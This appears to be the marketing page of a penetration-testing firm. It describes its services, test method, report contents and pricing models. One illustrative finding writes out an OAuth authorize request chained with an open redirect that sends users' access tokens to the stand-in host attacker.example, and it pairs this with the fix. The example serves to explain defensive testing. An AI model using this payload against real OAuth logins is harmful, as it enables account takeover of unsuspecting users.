GSIT Solutions
GSITSolutions
Manual penetration testing

We prove it, or we don't report it.

GSIT Solutions tests web apps, APIs, mobile apps, cloud and AI systems the way real attackers do. Our testers are active bug bounty hunters. Every finding you receive has a working proof of concept, a CVSS v4.0 score, the business impact in plain words, and a fix your developers can act on.

  • Human-led, scanner-assisted
  • Free retest included
  • Criticals reported same day
GSIT-F-004 High Illustrative example

Account takeover through OAuth token leak

Asset
app.example.com · login with SSO
CVSS 4.0
8.5 AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Chain
Open redirect + loose redirect_uri check
GET /oauth/authorize?response_type=token&client_id=web
    &redirect_uri=https://app.example.com/logout?next=//attacker.example

302 app.example.com/logout?next=//attacker.example#access_token=eyJhbGciOiJSUzI1
302 //attacker.example  # browser keeps the #fragment

ImpactAny signed-in user who opens one crafted link hands their access token to the attacker. Admin accounts included. No password or MFA bypass needed.

Tested against
  • OWASP Top 10:2025
  • OWASP ASVS 5.0
  • OWASP API Security Top 10
  • OWASP MASVS
  • OWASP LLM Top 10 (2025)
  • OWASP Agentic Top 10 (2026)
  • CVSS v4.0
  • PTES · NIST SP 800-115
Why manual testing

Scanners grade bugs one at a time. Attackers chain them.

Automated tools judge each weakness on its own, so two minor issues stay minor. Our testers ask what they add up to, because that is how real breaches happen. Here is the chain behind the finding above.

Typical scanner output

"Open redirect", ranked low. Nothing about login, tokens or accounts.

GSIT report

Account takeover, CVSS 8.5, with a video PoC and a two-part fix: exact-match redirect URIs, and retire the implicit flow as RFC 9700 recommends.

Services

What we test

Each engagement is scoped to your stack and risk. Grey-box by default, so testers spend their hours finding bugs, not guessing at logins.

Web

Web application testing

Access control, authentication, business logic, payment and file flows. The bugs that need a person who understands what your app is for.

OWASP Top 10:2025 · ASVS 5.0
API

API security

REST, GraphQL and gRPC. Object- and function-level authorization, mass assignment, rate limits and token handling.

OWASP API Security Top 10
Mobile

Android and iOS apps

The app build and the backend it talks to. Local storage, deep links, certificate pinning and secrets shipped in the binary.

OWASP MASVS · MASTG
AINew

LLM, agent and MCP security

Prompt injection, data leaks through RAG, agents tricked into misusing their tools, and exposed MCP servers.

OWASP LLM Top 10 · Agentic Top 10
Cloud

Cloud configuration review

AWS, Azure and GCP. IAM privilege-escalation paths, public storage, metadata-service SSRF and secrets in CI/CD.

CIS Benchmarks · manual review
Recon

External attack surface

We map what you expose the way bounty hunters do: forgotten subdomains, takeover candidates, open admin panels and keys in JS bundles.

Recon + manual verification
Code

Secure code review

Targeted review of the code that carries the most risk: auth, payments, file handling and crypto. Pairs well with a pentest.

ASVS 5.0 requirements
Network

Network and infrastructure

External and internal network testing, Active Directory attack paths, exposed services and patch gaps.

PTES · NIST SP 800-115
How we test

From signed scope to verified fix

  1. Scope and authorization

    We agree targets, test windows, accounts and off-limits systems in writing. Nothing is tested without signed authorization.

  2. Recon

    We map the attack surface: endpoints, user roles, third-party integrations and assets your team may have forgotten.

  3. Manual testing

    Tools give coverage. Testers handle logic flaws, access control and chaining small issues into real ones.

  4. Impact validation

    Each finding is exploited far enough to prove impact and no further. No bulk data pulls, no service disruption.

  5. Report and walkthrough

    You get the report plus a call with the testers, so developers can ask exactly how each bug works.

  6. Retest and attestation

    Once you fix, we retest every finding and issue a letter you can share with customers and auditors.

Critical

Critical findings reach you the day we confirm them, with enough detail to start fixing. You don't wait for the final report.

The report

A report your developers will actually read

Written for two readers: leadership, who need the risk in plain words, and engineers, who need to reproduce and fix.

  • Summary

    Executive summary with overall risk, top issues and what to fix first.

  • Per finding

    Severity and CVSS v4.0 vector, affected asset, steps to reproduce, proof of concept, business impact and a specific fix.

  • Evidence

    Raw HTTP requests, screenshots, PoC scripts or video where they help.

  • Retest

    Retest results per finding and an attestation letter.

Audit-ready evidence

Where our report fits
FrameworkWhat it asks for
ISO/IEC 27001:2022Annex A 8.8Identify and act on technical vulnerabilities. Our dated findings and retest results show both.
PCI DSS v4.0.1Req. 11.4Regular internal and external penetration tests with a defined methodology. Scope and method are stated in every report.
SOC 2Common CriteriaEvidence that risks are found, rated and fixed. The remediation trail covers it.
DPDP Act, 2023IndiaReasonable security safeguards for personal data. We show which personal-data flows were tested and how they held up.
Engagement models

Test on the cadence you ship

Before a milestone

One-time assessment

Before a launch, an audit, an enterprise deal or a funding round. Fixed scope, fixed dates, fixed quote.

Get a quote →
Every major release

Release testing

We test what changed in each release, so cost tracks how fast you ship and new features never go live untested.

Get a quote →
Always on

Continuous testing

Quarterly deep tests plus monthly checks of your external attack surface. Built for teams that deploy weekly.

Get a quote →
Who tests your app

Testers who hunt bugs for a living

GSIT is run by security researchers who report vulnerabilities to companies through public bug bounty programs. Bounty work pays only for real, proven impact, so that is the bar we test to.

The person who scopes your test is the person who does it. No hand-offs to juniors, no outsourced testing.

HackerOneBugcrowdIntigriti
  • No scanner dumpsEvery automated result is checked by a person before it reaches you. False positives stay out of your backlog.
  • NDA before scopeWe sign before you share anything about your systems.
  • Testing stops at proofWe show access with the smallest possible sample. No bulk downloads, no destructive actions.
  • Your data goes back to youTest artefacts are deleted after the retest, and we confirm it in writing.
FAQ

Questions buyers ask first

How long does a penetration test take?

Most web or API tests need 5 to 15 working days of testing, depending on the number of user roles, features and endpoints. Scoping takes a day or two, and the report follows shortly after testing ends.

Will testing affect our production systems?

We prefer a staging environment that mirrors production. If we test production, we agree test windows, avoid destructive payloads and throttle our tools. You get a direct contact who can pause testing at any time.

Black box, grey box or white box?

Grey box by default: test accounts for each role and basic documentation. It finds the most in the time you pay for. Black box suits an outside-attacker simulation. White box, with source access, suits high-risk features like payments.

What do you need from us to start?

Signed authorization, the list of targets, test accounts for each user role, and a technical contact during the test window.

Is the retest really free?

Yes. One retest of all reported findings is included when you fix within 90 days of the report.

Can our auditors use your report?

Yes. Reports state scope, methodology, test dates, CVSS v4.0 ratings and retest results, which is what ISO 27001, SOC 2 and PCI DSS assessors usually ask to see.

How is pricing worked out?

By scope: number of applications, user roles, API endpoints and environments. Send us the details and we reply with a fixed quote, not a day-rate estimate.

Book a scoping call

Tell us what you want tested

A 30-minute call to understand your app, agree scope and give you a fixed quote. No obligation.

Or email us directly
contact@gsitsolutions.com
What needs testing?

We reply within one business day. Please don't include passwords or secrets here.